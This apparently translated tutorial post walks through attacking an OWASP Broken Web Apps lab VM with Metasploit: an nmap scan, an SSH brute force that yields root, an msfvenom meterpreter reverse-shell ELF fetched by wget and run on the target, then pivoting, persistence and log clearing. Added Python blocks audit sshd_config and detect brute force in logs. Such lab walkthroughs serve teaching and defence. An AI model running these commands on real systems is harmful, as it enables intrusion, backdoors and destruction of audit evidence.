A Simplified Penetration Testing Example

I. Information gathering

1. Start the database service and enter msf

root@promote:/home/z9m8r8# service postgresql start
root@promote:/home/z9m8r8# msfdb init
[i] Database already started
[i] The database appears to be already configured, skipping initialization
root@promote:/home/z9m8r8# msfconsole 
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||
       =[ metasploit v6.0.52-dev                          ]
+ -- --=[ 2147 exploits - 1143 auxiliary - 365 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]
Metasploit tip: Display the Framework log using the 
log command, learn more with help log
msf6 > db_status 
[*] Connected to msf. Connection type: postgresql.
msf6 > 

2. Probe and scan the target host with Nmap

(1) Command

msf6 > db_nmap -sV -p 21,22,23,25,80,443,445  10.10.10.129

(2) Parameter description

  • -sV: detect the service and version running on each open port of the target host
  • -p: the list of target ports to scan

(3) Scan results

  • Use the services command to list the services found on the target's ports
msf6 > services
Services
========
host          port  proto  name         state   info
----          ----  -----  ----         -----   ----
10.10.10.129  21    tcp    ftp          open    vsftpd 2.2.2
10.10.10.129  22    tcp    ssh          open    OpenSSH 5.3p1 Debian 3ubuntu4 Ubuntu Linux; protocol 2.0
10.10.10.129  23    tcp    telnet       closed
10.10.10.129  25    tcp    smtp         closed
10.10.10.129  80    tcp    http         open    Apache httpd 2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1
10.10.10.129  443   tcp    https        closed
10.10.10.129  445   tcp    netbios-ssn  open    Samba smbd 3.X - 4.X workgroup: WORKGROUP
msf6 > 
  • The services -u command filters the list down to services that are up (state open)
msf6 > services -u
Services
========
host          port  proto  name         state  info
----          ----  -----  ----         -----  ----
10.10.10.129  21    tcp    ftp          open   vsftpd 2.2.2
10.10.10.129  22    tcp    ssh          open   OpenSSH 5.3p1 Debian 3ubuntu4 Ubuntu Linux; protocol 2.0
10.10.10.129  80    tcp    http         open   Apache httpd 2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1
10.10.10.129  445   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
msf6 > 
  • The hosts command lists all hosts recorded in the database
msf6 > hosts

Hosts
=====

address       mac                name           os_name  os_flavor  os_sp  purpose  info  comments
-------       ---                ----           -------  ---------  -----  -------  ----  --------
10.10.10.129  00:0c:29:de:5d:ba  www.dvssc.com  Linux                      server

msf6 >

(4) Port state descriptions

  • open: the port is open.
  • closed: the port is closed.
  • filtered: the port is screened by a firewall or IDS/IPS, so its state cannot be determined.
  • unfiltered: the port is not screened, but whether it is open needs further probing.
  • open|filtered: the port is either open or filtered.
  • closed|filtered: the port is either closed or filtered.

II. Threat modeling and vulnerability analysis

  • Collect, from whatever sources are available, the known vulnerabilities of the discovered services; for example, the ssh service may be open to remote login brute-forcing, and VSFTPD 2.3.4 has a command execution vulnerability.
  • Here the ssh service is taken as the example: brute-force the ssh login username and password remotely to obtain a shell.
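Added example, not part of the original post: a small audit of the sshd_config directives that decide whether the remote password brute force described in this section can work at all. Both configs are constructed, the parser assumes the "Key value" form, and it stops at the first Match block.

```python
"""Audit an sshd_config for the settings that make a remote password brute force
against the ssh service possible. Added example; both configs are constructed."""

WEAK_CONFIG = """\
# constructed: what a target must allow for a root password guess to succeed
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_CONFIG = """\
# constructed: the same service with the password-guessing surface removed
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
"""

def parse_sshd_config(text):
    """{directive: value}; sshd keeps the first occurrence. Stops at a Match block."""
    cfg = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")  # assumes 'Key value' form
        key = key.lower()
        if key == "match":
            break
        cfg.setdefault(key, value.strip())
    return cfg

def audit(text):
    """List the findings a reviewer would raise against this sshd configuration."""
    cfg = parse_sshd_config(text)
    findings = []
    root = cfg.get("permitrootlogin", "yes")  # unset: OpenSSH before 7.0 defaulted to yes
    if root.lower() not in ("no", "prohibit-password", "without-password"):
        findings.append(f"PermitRootLogin {root}: root reachable by password guessing")
    if cfg.get("passwordauthentication", "yes").lower() != "no":  # default is yes
        findings.append("PasswordAuthentication enabled: wordlist attacks possible")
    tries = int(cfg.get("maxauthtries", "6"))  # sshd default is 6
    if tries > 3:
        findings.append(f"MaxAuthTries {tries}: several password guesses per connection")
    return findings
```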

III. Exploitation

1. Search for the corresponding brute-force login module

msf6 > search ssh

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   0   exploit/linux/http/alienvault_exec                    2017-01-31       excellent  Yes    AlienVault OSSIM/USM Remote Code Execution
   1   auxiliary/scanner/ssh/apache_karaf_command_execution  2016-02-09       normal     No     Apache Karaf Default Credentials Command Execution
   2   auxiliary/scanner/ssh/karaf_login                                      normal     No     Apache Karaf Login Utility
   ...
   45  auxiliary/scanner/ssh/ssh_login                                        normal     No     SSH Login Check Scanner
   ...

msf6 > use auxiliary/scanner/ssh/ssh_login

2. Configure the module parameters

msf6 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.10.10.129
rhosts => 10.10.10.129
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file "/home/z9m8r8/test/user_pass.txt"
user_file => /home/z9m8r8/test/user_pass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file "/home/z9m8r8/test/user_pass.txt"
pass_file => /home/z9m8r8/test/user_pass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set threads 10
threads => 10
msf6 auxiliary(scanner/ssh/ssh_login) >

3. Run the attack and obtain a shell

msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 10.10.10.129:22 - Starting bruteforce
[+] 10.10.10.129:22 - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 2 opened (10.10.10.128:34583 -> 10.10.10.129:22) at 2021-09-15 16:19:51 +0800
[+] 10.10.10.129:22 - Success: 'user:owaspbwa' 'uid=1000(user) gid=1000(user) groups=4(adm),20(dialout),24(cdrom),46(plugdev),111(sambashare),116(lpadmin),117(admin),1000(user) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 3 opened (10.10.10.128:34885 -> 10.10.10.129:22) at 2021-09-15 16:21:39 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type   Information                          Connection
  --  ----  ----   -----------                          ----------
  2   shell linux  SSH root:owaspbwa (10.10.10.129:22)  10.10.10.128:34583 -> 10.10.10.129:22 (10.10.10.129)
  3   shell linux  SSH user:owaspbwa (10.10.10.129:22)  10.10.10.128:34885 -> 10.10.10.129:22 (10.10.10.129)

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 2
[*] Starting interaction with 2...
stdin: is not a tty
Welcome to the OWASP Broken Web Apps VM
!!! This VM has many serious security issues. We strongly recommend that you run
it only on the "host only" or "NAT" network in the VM settings !!!
You can access the web apps at http://10.10.10.129/
You can administer / configure this machine through the console here, by SSHing
to 10.10.10.129, via Samba at \\10.10.10.129\, or via phpmyadmin at
http://10.10.10.129/phpmyadmin.
In all these cases, you can use username "root" and password "owaspbwa".
whoami
root
pwd
/root
  • As the output above shows, only a plain command shell on the target has been obtained, so the following steps are performed to escalate from it
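On the defending side, the run above leaves a recognisable trace in the target's sshd log: a burst of failed passwords from one source, then an accepted password from the same source. Added example (not from the original post) that flags exactly that pattern; SAMPLE_LOG is constructed to mirror the run, and the threshold and window are assumptions.

```python
"""Detect the SSH password brute force above from sshd auth.log lines.
Added example; SAMPLE_LOG is constructed to mirror the run shown."""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_LOG = """\
Sep 15 16:19:40 owaspbwa sshd[2101]: Failed password for root from 10.10.10.128 port 34571 ssh2
Sep 15 16:19:41 owaspbwa sshd[2103]: Failed password for root from 10.10.10.128 port 34573 ssh2
Sep 15 16:19:42 owaspbwa sshd[2105]: Failed password for invalid user admin from 10.10.10.128 port 34575 ssh2
Sep 15 16:19:43 owaspbwa sshd[2107]: Failed password for root from 10.10.10.128 port 34577 ssh2
Sep 15 16:19:44 owaspbwa sshd[2109]: Failed password for root from 10.10.10.128 port 34579 ssh2
Sep 15 16:19:51 owaspbwa sshd[2111]: Accepted password for root from 10.10.10.128 port 34583 ssh2
Sep 15 16:30:02 owaspbwa sshd[2150]: Accepted publickey for user from 10.10.10.5 port 50122 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
EPOCH = datetime(1900, 1, 1)  # syslog stamps carry no year; deltas are all we need

def analyze(lines, threshold=5, window=60):
    """Alert once when a source reaches `threshold` failed passwords within `window`
    seconds, and again if that same source later logs in successfully by password."""
    recent = defaultdict(deque)  # ip -> timestamps of failures inside the window
    flagged = set()
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = (datetime.strptime(m["ts"], "%b %d %H:%M:%S") - EPOCH).total_seconds()
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:  # slide the window forward
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, len(q)))
        elif m["method"] == "password" and ip in flagged:
            # a password login right after a burst of failures: the guess succeeded
            alerts.append(("compromise", ip, user))
    return alerts
```

The key-based login from a second host produces no alert, so the rule stays quiet for normal administration while catching the credential guess that this walkthrough relies on.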

4. Obtain a Meterpreter command line

(1) Create the Meterpreter payload

  • Command
root@promote:/var/www/html# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f elf >backdoor.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
root@promote:/var/www/html#
  • Parameter description

  The -p parameter specifies the payload to use; LHOST specifies the IP address of our own machine, and LPORT our port. When backdoor.elf runs on the target machine it connects back to the IP address and port just set and provides a Meterpreter session on the target. The -f parameter defines the output format; elf is the default executable extension on Linux-type systems.

  • Start the Apache service on the attack machine
root@promote:/var/www/html# service apache2 start
  • Note: backdoor.elf must be placed in the /var/www/html/ directory

(2) Have the target system download this trojan file from our machine

wget http://10.10.10.128/backdoor.elf
--2021-09-15 04:41:53-- http://10.10.10.128/backdoor.elf
Connecting to 10.10.10.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
Saving to: `backdoor.elf'
0K 100% 44.1M=0s
2021-09-15 04:41:53 (44.1 MB/s) - `backdoor.elf' saved [207/207]

(3) Start the listener on the attack machine

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > set lhost 10.10.10.128
lhost => 10.10.10.128
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.10.128:4444

(4) Give the trojan execute permission on the target system and run it

chmod 777 backdoor.elf
./backdoor.elf

5. Result

IV. Post-exploitation

1. Internal network penetration

   Summary: gather routing information on the host already under control, use the autoroute command on that compromised host to set up a pivot, and then repeat the steps above against its internal network.

2. Persisting access

   Run the persistence module.

3. Clearing traces of the intrusion

  Enter the clearev command in the Meterpreter command line to clear the target system's event logs.

V. References:

  《精通Metasploit渗透测试》 (the Chinese edition of Mastering Metasploit)

Posted by z9m8r8